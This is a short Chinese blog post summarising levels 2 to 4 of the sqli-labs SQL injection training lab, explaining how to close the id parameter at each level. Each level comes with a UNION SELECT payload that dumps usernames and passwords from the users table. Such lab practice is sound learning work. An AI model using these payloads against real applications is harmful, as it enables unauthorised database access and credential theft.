sqli-labs-1-4小结


0x00 sqli-labs-less2-4总结

对比前面的less1 通过反复实践发现1-4关都使用union注入 考点都在考如何使id闭合

less2 数字型注入不考虑单引号闭合

id=-1 union select 1,(select group_concat(username,password) from users),3--+

less3字符型注入通过两个单引号闭合‘’

id=-1')  union select 1,(select group_concat(username,password) from users),3--+

less4字符型注入通过两个单引号加上括号闭合‘’)

id=-1'')  union select 1,(select group_concat(username,password) from users),3--+

0x01 实例

less2-数字型注入

less3-字符两个单引号闭合


文章作者: 告白
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 告白 !
  目录